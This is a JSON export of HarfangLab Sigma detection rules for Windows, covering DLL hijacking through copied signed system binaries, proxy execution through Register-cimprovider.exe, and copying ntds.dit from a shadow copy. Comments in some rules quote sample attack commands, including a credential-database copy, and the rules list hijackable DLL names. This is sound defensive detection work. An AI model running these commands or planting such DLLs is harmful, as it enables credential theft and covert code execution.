"rule_description": "Detects potential Windows DLL Hijacking via chglogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "06be143e-b032-4364-923d-de4d6d136dd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097139Z",
"creation_date": "2026-03-23T11:45:34.097140Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097145Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsacls.yml",
"content": "title: DLL Hijacking via DSACLS.exe\nid: 06be143e-b032-4364-923d-de4d6d136dd3\ndescription: |\n Detects potential Windows DLL Hijacking via DSACLS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DSACLS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "06be143e-b032-4364-923d-de4d6d136dd3",
"rule_name": "DLL Hijacking via DSACLS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via DSACLS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "06f328a3-6c34-4480-b44a-5ccfa923f899",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081565Z",
"creation_date": "2026-03-23T11:45:34.081567Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081571Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gamepanel.yml",
"content": "title: DLL Hijacking via gamepanel.exe\nid: 06f328a3-6c34-4480-b44a-5ccfa923f899\ndescription: |\n Detects potential Windows DLL Hijacking via gamepanel.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gamepanel.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dcomp.dll'\n - '\\dwmapi.dll'\n - '\\DWrite.dll'\n - '\\dxgi.dll'\n - '\\msdrm.dll'\n - '\\uianimation.dll'\n - '\\UIAutomationCore.DLL'\n - '\\UxTheme.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "06f328a3-6c34-4480-b44a-5ccfa923f899",
"rule_name": "DLL Hijacking via gamepanel.exe",
"rule_description": "Detects potential Windows DLL Hijacking via gamepanel.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "070c26de-9c37-4449-81eb-9d5f6a91c83b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593760Z",
"creation_date": "2026-03-23T11:45:34.593764Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593771Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_musnotificationux.yml",
"content": "title: DLL Hijacking via musnotificationux.exe\nid: 070c26de-9c37-4449-81eb-9d5f6a91c83b\ndescription: |\n Detects potential Windows DLL Hijacking via musnotificationux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'musnotificationux.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\DMCmnUtils.dll'\n - '\\UpdatePolicy.dll'\n - '\\UPShared.dll'\n - '\\WINHTTP.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "070c26de-9c37-4449-81eb-9d5f6a91c83b",
"rule_name": "DLL Hijacking via musnotificationux.exe",
"rule_description": "Detects potential Windows DLL Hijacking via musnotificationux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "072eb6a2-64bf-4b66-86f2-77e8e429ef63",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586156Z",
"creation_date": "2026-03-23T11:45:34.586174Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586191Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_auditpol.yml",
"content": "title: DLL Hijacking via auditpol.exe\nid: 072eb6a2-64bf-4b66-86f2-77e8e429ef63\ndescription: |\n Detects potential Windows DLL Hijacking via auditpol.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'auditpol.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\auditpolcore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "072eb6a2-64bf-4b66-86f2-77e8e429ef63",
"rule_name": "DLL Hijacking via auditpol.exe",
"rule_description": "Detects potential Windows DLL Hijacking via auditpol.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "073992cd-3d71-4560-89eb-235eb6cfdf65",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086864Z",
"creation_date": "2026-03-23T11:45:34.086867Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086881Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/",
"https://twitter.com/PhilipTsukerman/status/992021361106268161",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_register_cimprovider.yml",
"content": "title: Suspicious Proxy Execution via Register-cimprovider.exe\nid: 073992cd-3d71-4560-89eb-235eb6cfdf65\ndescription: |\n Detects the use of Register-cimprovider.exe which is used to register new WMI providers to proxy execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to execute malicious DLLs.\n Attackers may abused it to bypass security restrictions.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Register-CimProvider process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/\n - https://twitter.com/PhilipTsukerman/status/992021361106268161\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/03/01\nmodified: 2025/06/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.RegisterCimProvider\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Register-cimprovider.exe'\n - OriginalFileName: 'Register-CimProvider2.exe'\n\n selection_command:\n # C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path C:\\AtomicRedTeam\\atomics\\T1218\\src\\Win32\\T1218-2.dll\n # Register-cimprovider -path \"C:\\folder\\evil.dll\"\n CommandLine|contains|all:\n - ' -path '\n - '.dll'\n\n exclusion_programfiles:\n CommandLine|contains:\n - ' -Path ?:\\Program Files\\'\n - ' -Path ?:\\Program Files (x86)\\'\n\n # https://learn.microsoft.com/fr-fr/troubleshoot/mem/configmgr/endpoint-protection/configmgr-console-shows-out-of-date-values\n exclusion_protectionmanagement:\n CommandLine|contains|all:\n - '-ProviderName ProtectionManagement -Namespace root\\Microsoft\\protectionmanagement -Path'\n - '\\ProtectionManagement.dll'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "073992cd-3d71-4560-89eb-235eb6cfdf65",
"rule_name": "Suspicious Proxy Execution via Register-cimprovider.exe",
"rule_description": "Detects the use of Register-cimprovider.exe which is used to register new WMI providers to proxy execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to execute malicious DLLs.\nAttackers may abused it to bypass security restrictions.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Register-CimProvider process.\n",
"rule_creation_date": "2022-03-01",
"rule_modified_date": "2025-06-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "074c0895-1c28-4998-833c-644cd8fa5ff0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094771Z",
"creation_date": "2026-03-23T11:45:34.094773Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094777Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/003/",
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1003_003_powershell_ntds_shadow_copy.yml",
"content": "title: NTDS Dumped from a Volume Shadow Copy via PowerShell\nid: 074c0895-1c28-4998-833c-644cd8fa5ff0\ndescription: |\n Detects a copy of the ntds.dit file from a Volume Shadow Copy with PowerShell in interactive mode.\n Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the domain controller to determine legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1003/003/\n - https://attack.mitre.org/techniques/T1006/\ndate: 2022/05/10\nmodified: 2025/09/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.t1078\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n # copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\shadowcopy\n PowershellCommand|contains|all:\n - 'copy '\n - 'GLOBALROOT'\n - 'HarddiskVolumeShadowCopy'\n - 'ntds.dit'\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "074c0895-1c28-4998-833c-644cd8fa5ff0",
"rule_name": "NTDS Dumped from a Volume Shadow Copy via PowerShell",
"rule_description": "Detects a copy of the ntds.dit file from a Volume Shadow Copy with PowerShell in interactive mode.\nAdversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the domain controller to determine legitimacy.\n",
"rule_creation_date": "2022-05-10",
"rule_modified_date": "2025-09-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.003",
"attack.t1006",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "07c550a4-29ed-429b-8c3a-f6b59266b530",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593517Z",
"creation_date": "2026-03-23T11:45:34.593520Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593528Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sppextcomobj.yml",
"content": "title: DLL Hijacking via sppextcomobj.exe\nid: 07c550a4-29ed-429b-8c3a-f6b59266b530\ndescription: |\n Detects potential Windows DLL Hijacking via sppextcomobj.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sppextcomobj.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\adsldpc.dll'\n - '\\CRYPTBASE.dll'\n - '\\DNSAPI.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "07c550a4-29ed-429b-8c3a-f6b59266b530",
"rule_name": "DLL Hijacking via sppextcomobj.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sppextcomobj.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "07ddc2b1-4842-43eb-92d7-df872335fcf9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098449Z",
"creation_date": "2026-03-23T11:45:34.098451Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098455Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_adobe_licensing.yml",
